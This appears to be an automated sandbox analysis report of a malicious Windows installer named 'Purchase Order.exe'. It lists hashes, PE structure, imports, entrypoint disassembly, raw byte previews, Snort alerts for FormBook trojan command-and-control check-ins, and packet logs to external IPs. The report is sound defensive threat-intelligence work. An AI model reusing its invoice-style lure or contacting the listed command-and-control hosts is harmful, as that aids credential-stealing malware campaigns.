Preview:	h ..,.... .....j.}..Y[...D.V)Nt_..LY.g.Y.io...qDG.ICo5..(3......z)..<:?&cm.Y.fG>y.g./.K...Q{:.....I.a..&^.~}.....x\|zpg8........d.........s..i.....T_.:C.z.....Fw..Q.(.0.DV..tB0z.Y......81..l..==.AH...G......\..h..]...pW!!..n...I7..s.%....uo......4#.....kPb...7.RN.G.0.g...I.1_.LY.g.Y..o...qDG.I.o5..(3...../".U.l....'..l...,.....Q.....<.n...."......Y6...u.%...S..g8...../..7...j..V..........=e..Wa.>Z.....R;6p:^.e..DV..tB0z..............#voH...G....y...?h/b....pW!!...n...I7....%...yuo....1.4#.....kPb...7...G.0.g...INt_..LY.g.Y.io...qDG.ICo5..(3...../".U.l....'..l...,.....Q.....<.n...."......Y6...u.%...S..g8...../..7...j..V..........=e..Wa.>Z.....R;6p:^.e..DV..tB0z.Y.....-R1..Z...QoH...G....y...?h.b....pW!!...n...I7....%...yuo....1.4#.....kPb...7...G.0.g...INt_..LY.g.Y.io...qDG.ICo5..(3...../".U.l....'..l...,.....Q.....<.n...."......Y6...u.%...S..g8...../..7...j..V..........=e..Wa.>Z.....R;6p:^.e..DV..tB0z.Y.....-R1..Z...QoH...G....y...?h.b....pW!!.

C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Download File

Process:	C:\Users\user\Desktop\Purchase Order.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	59904
Entropy (8bit):	5.958471679139665
Encrypted:	false
SSDEEP:	1536:Z1ep1tOKxVeU01JVlG9NSstFdGxveJh7LY0L:Z10tOKinJlwN2ypL
MD5:	E9A4818AC7164F4FF1B2ABFD99B75F6C
SHA1:	EFA6A80E1B01DA25D253D40AAAB35EE0596324C6
SHA-256:	A2A61B330CDEDC8CC6100BCA4F8ADA8EAD9F626C68674014C7A1A7DA79DF399E
SHA-512:	4F12C891BAE50ED09BE0AB4688629089D0A9BAC2FC0B41E69122B54651B1B932F2888B0A66CDFBD2D4E6B4067DA3C9159B38B0FD2AB27C45A1E9DFB1707DED06
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 69%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........i..e:..e:..e:..d;..e:..d:..e:..a:..e:x.k:..e:..o:.e:u.a;..e:u.:..e:u.g;..e:Rich..e:........PE..L...8.Pc...............!..........................@..........................0............@.................................................................. ......4...................................................(............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.908709479561615
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Purchase Order.exe
File size:	264302
MD5:	b0fcec089ad6578e526554a0865b5bff
SHA1:	d62e44c9af2f7aefffd7cb200306c845413a9b3c
SHA256:	5d954998ba8c1086f196cf2572f0690b97c5fba623d0ca057cea74dd77aae5e0
SHA512:	0d2e56dcdc99706d2ba1bd57b7b720856e47218c74f80867400d88bd163cacee575996db643c6b10920106ea8cc7a9a4f59d3751ebeb15587b3a66b6534e012b
SSDEEP:	6144:mbE/HUbuePgh2EIHLwMbcP0XA5TAVt5RRCLH:mb/ue41Ir1cP1ZAZR8LH
TLSH:	8F441264F2A8907BC0F011772D3697BB6FB7441281B95F6647503E9CBCA21C15B3E3A9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x40352d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F6D6CB5C0AAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F6D6CB5C07Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0xa50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6897	0x6a00	False	0.6661261792452831	data	6.458398214928006	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a6	0x1600	False	0.4392755681818182	data	5.024109281264143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	False	0.521484375	data	4.15458210408643	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x36000	0x10000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x46000	0xa50	0xc00	False	0.4007161458333333	data	4.172965800253538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x46190	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_DIALOG	0x46478	0x100	data	English	United States
RT_DIALOG	0x46578	0x11c	data	English	United States
RT_DIALOG	0x46698	0x60	data	English	United States
RT_GROUP_ICON	0x466f8	0x14	data	English	United States
RT_MANIFEST	0x46710	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.73.13.90.7649734802031449 10/24/22-11:09:04.619981	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.7	3.13.90.76
192.168.2.73.13.90.7649734802031412 10/24/22-11:09:04.619981	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.7	3.13.90.76
192.168.2.751.79.230.14749714802031453 10/24/22-11:07:25.079506	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49714	80	192.168.2.7	51.79.230.147
192.168.2.751.79.230.14749714802031412 10/24/22-11:07:25.079506	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49714	80	192.168.2.7	51.79.230.147
192.168.2.73.13.90.7649734802031453 10/24/22-11:09:04.619981	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49734	80	192.168.2.7	3.13.90.76
192.168.2.78.8.8.853336532023883 10/24/22-11:07:30.440332	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	53336	53	192.168.2.7	8.8.8.8
192.168.2.751.79.230.14749714802031449 10/24/22-11:07:25.079506	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49714	80	192.168.2.7	51.79.230.147

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2022 11:06:41.032999039 CEST	49704	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:06:41.188793898 CEST	80	49704	74.124.203.191	192.168.2.7
Oct 24, 2022 11:06:41.188980103 CEST	49704	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:06:41.189100981 CEST	49704	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:06:41.344669104 CEST	80	49704	74.124.203.191	192.168.2.7
Oct 24, 2022 11:06:41.346854925 CEST	80	49704	74.124.203.191	192.168.2.7
Oct 24, 2022 11:06:41.346899986 CEST	80	49704	74.124.203.191	192.168.2.7
Oct 24, 2022 11:06:41.347032070 CEST	49704	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:06:41.347253084 CEST	49704	80	192.168.2.7	74.124.203.191
Oct 24, 2022 11:06:41.502787113 CEST	80	49704	74.124.203.191	192.168.2.7
Oct 24, 2022 11:06:51.994309902 CEST	49705	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:52.134277105 CEST	80	49705	66.96.162.130	192.168.2.7
Oct 24, 2022 11:06:52.134449005 CEST	49705	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:52.149022102 CEST	49705	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:52.288708925 CEST	80	49705	66.96.162.130	192.168.2.7
Oct 24, 2022 11:06:52.303719997 CEST	80	49705	66.96.162.130	192.168.2.7
Oct 24, 2022 11:06:52.303750992 CEST	80	49705	66.96.162.130	192.168.2.7
Oct 24, 2022 11:06:52.303807020 CEST	49705	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:53.320116043 CEST	49705	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:54.324162960 CEST	49706	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:54.470149994 CEST	80	49706	66.96.162.130	192.168.2.7
Oct 24, 2022 11:06:54.470371962 CEST	49706	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:54.470487118 CEST	49706	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:54.617774010 CEST	80	49706	66.96.162.130	192.168.2.7
Oct 24, 2022 11:06:54.628061056 CEST	80	49706	66.96.162.130	192.168.2.7
Oct 24, 2022 11:06:54.628094912 CEST	80	49706	66.96.162.130	192.168.2.7
Oct 24, 2022 11:06:54.628364086 CEST	49706	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:54.628560066 CEST	49706	80	192.168.2.7	66.96.162.130
Oct 24, 2022 11:06:54.774394035 CEST	80	49706	66.96.162.130	192.168.2.7
Oct 24, 2022 11:06:59.699141979 CEST	49707	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:06:59.718992949 CEST	80	49707	217.160.0.87	192.168.2.7
Oct 24, 2022 11:06:59.719085932 CEST	49707	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:06:59.719254971 CEST	49707	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:06:59.738778114 CEST	80	49707	217.160.0.87	192.168.2.7
Oct 24, 2022 11:06:59.749049902 CEST	80	49707	217.160.0.87	192.168.2.7
Oct 24, 2022 11:06:59.749092102 CEST	80	49707	217.160.0.87	192.168.2.7
Oct 24, 2022 11:06:59.749161959 CEST	49707	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:07:00.730182886 CEST	49707	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:07:01.746512890 CEST	49708	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:07:01.766182899 CEST	80	49708	217.160.0.87	192.168.2.7
Oct 24, 2022 11:07:01.766326904 CEST	49708	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:07:01.766500950 CEST	49708	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:07:01.785959005 CEST	80	49708	217.160.0.87	192.168.2.7
Oct 24, 2022 11:07:01.791923046 CEST	80	49708	217.160.0.87	192.168.2.7
Oct 24, 2022 11:07:01.791949987 CEST	80	49708	217.160.0.87	192.168.2.7
Oct 24, 2022 11:07:01.792217016 CEST	49708	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:07:01.792728901 CEST	49708	80	192.168.2.7	217.160.0.87
Oct 24, 2022 11:07:01.812100887 CEST	80	49708	217.160.0.87	192.168.2.7
Oct 24, 2022 11:07:06.985616922 CEST	49709	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:07.307960033 CEST	80	49709	155.159.61.221	192.168.2.7
Oct 24, 2022 11:07:07.308192968 CEST	49709	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:07.308382988 CEST	49709	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:07.630709887 CEST	80	49709	155.159.61.221	192.168.2.7
Oct 24, 2022 11:07:07.630737066 CEST	80	49709	155.159.61.221	192.168.2.7
Oct 24, 2022 11:07:07.630750895 CEST	80	49709	155.159.61.221	192.168.2.7
Oct 24, 2022 11:07:07.630835056 CEST	49709	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:08.309000015 CEST	49709	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:09.325268984 CEST	49710	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:09.650275946 CEST	80	49710	155.159.61.221	192.168.2.7
Oct 24, 2022 11:07:09.654150963 CEST	49710	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:09.654423952 CEST	49710	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:09.979254961 CEST	80	49710	155.159.61.221	192.168.2.7
Oct 24, 2022 11:07:09.979324102 CEST	80	49710	155.159.61.221	192.168.2.7
Oct 24, 2022 11:07:09.979357004 CEST	80	49710	155.159.61.221	192.168.2.7
Oct 24, 2022 11:07:09.979576111 CEST	49710	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:09.980099916 CEST	49710	80	192.168.2.7	155.159.61.221
Oct 24, 2022 11:07:10.304850101 CEST	80	49710	155.159.61.221	192.168.2.7
Oct 24, 2022 11:07:15.067686081 CEST	49711	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:15.101363897 CEST	80	49711	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:15.102626085 CEST	49711	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:15.103127003 CEST	49711	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:15.137954950 CEST	80	49711	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:15.167011023 CEST	80	49711	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:15.167045116 CEST	80	49711	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:15.167057991 CEST	80	49711	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:15.167179108 CEST	49711	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:16.106576920 CEST	49711	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:17.122628927 CEST	49712	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:17.156615019 CEST	80	49712	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:17.156796932 CEST	49712	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:17.157042027 CEST	49712	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:17.190756083 CEST	80	49712	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:17.231091976 CEST	80	49712	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:17.231126070 CEST	80	49712	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:17.231138945 CEST	80	49712	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:17.231265068 CEST	49712	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:17.231492043 CEST	49712	80	192.168.2.7	46.249.204.182
Oct 24, 2022 11:07:17.265233994 CEST	80	49712	46.249.204.182	192.168.2.7
Oct 24, 2022 11:07:22.712416887 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:22.885844946 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:22.886034012 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:22.886236906 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.058995962 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522715092 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522746086 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522770882 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522794008 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522813082 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522830963 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.522840023 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522866011 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522870064 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.522892952 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.522911072 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522938013 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522948980 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.522964001 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.522996902 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.696149111 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.696197987 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.696218014 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.696237087 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.696255922 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.696254015 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.696276903 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.696296930 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.696310997 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.696316957 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.696333885 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.696336031 CEST	80	49713	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:23.696368933 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.696382046 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:23.896368980 CEST	49713	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:24.904537916 CEST	49714	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:25.078737020 CEST	80	49714	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:25.079220057 CEST	49714	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:25.079505920 CEST	49714	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:25.252892017 CEST	80	49714	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:25.387295008 CEST	80	49714	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:25.387370110 CEST	80	49714	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:25.387468100 CEST	49714	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:25.387670994 CEST	49714	80	192.168.2.7	51.79.230.147
Oct 24, 2022 11:07:25.561012983 CEST	80	49714	51.79.230.147	192.168.2.7
Oct 24, 2022 11:07:30.707771063 CEST	49715	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:30.920599937 CEST	80	49715	154.209.88.140	192.168.2.7
Oct 24, 2022 11:07:30.920962095 CEST	49715	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:30.921325922 CEST	49715	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:31.134205103 CEST	80	49715	154.209.88.140	192.168.2.7
Oct 24, 2022 11:07:31.212583065 CEST	80	49715	154.209.88.140	192.168.2.7
Oct 24, 2022 11:07:31.213624954 CEST	80	49715	154.209.88.140	192.168.2.7
Oct 24, 2022 11:07:31.216970921 CEST	49715	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:31.925343990 CEST	49715	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:32.935585976 CEST	49716	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:33.149082899 CEST	80	49716	154.209.88.140	192.168.2.7
Oct 24, 2022 11:07:33.149214983 CEST	49716	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:33.150590897 CEST	49716	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:33.363351107 CEST	80	49716	154.209.88.140	192.168.2.7
Oct 24, 2022 11:07:33.389906883 CEST	80	49716	154.209.88.140	192.168.2.7
Oct 24, 2022 11:07:33.391088963 CEST	80	49716	154.209.88.140	192.168.2.7
Oct 24, 2022 11:07:33.402199984 CEST	49716	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:33.402199984 CEST	49716	80	192.168.2.7	154.209.88.140
Oct 24, 2022 11:07:33.616436958 CEST	80	49716	154.209.88.140	192.168.2.7
Oct 24, 2022 11:07:38.704822063 CEST	49717	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:39.001421928 CEST	80	49717	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:39.001642942 CEST	49717	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:39.144342899 CEST	49717	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:39.443026066 CEST	80	49717	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:39.443233013 CEST	80	49717	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:39.443259954 CEST	80	49717	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:39.443281889 CEST	80	49717	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:39.443377972 CEST	49717	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:39.443761110 CEST	49717	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:40.666558027 CEST	49717	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:41.955640078 CEST	49718	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:42.234783888 CEST	80	49718	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:42.234991074 CEST	49718	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:42.287992954 CEST	49718	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:42.567284107 CEST	80	49718	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:42.567344904 CEST	80	49718	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:42.567365885 CEST	80	49718	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:42.567382097 CEST	80	49718	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:42.567610979 CEST	49718	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:42.598469973 CEST	49718	80	192.168.2.7	150.95.59.33
Oct 24, 2022 11:07:42.877415895 CEST	80	49718	150.95.59.33	192.168.2.7
Oct 24, 2022 11:07:47.697447062 CEST	49719	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:47.863138914 CEST	80	49719	192.64.116.149	192.168.2.7
Oct 24, 2022 11:07:47.863351107 CEST	49719	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:47.863508940 CEST	49719	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:48.029509068 CEST	80	49719	192.64.116.149	192.168.2.7
Oct 24, 2022 11:07:48.139781952 CEST	80	49719	192.64.116.149	192.168.2.7
Oct 24, 2022 11:07:48.181453943 CEST	49719	80	192.168.2.7	192.64.116.149
Oct 24, 2022 11:07:48.863159895 CEST	80	49719	192.64.116.149	192.168.2.7
Oct 24, 2022 11:07:48.863245964 CEST	49719	80	192.168.2.7	192.64.116.149
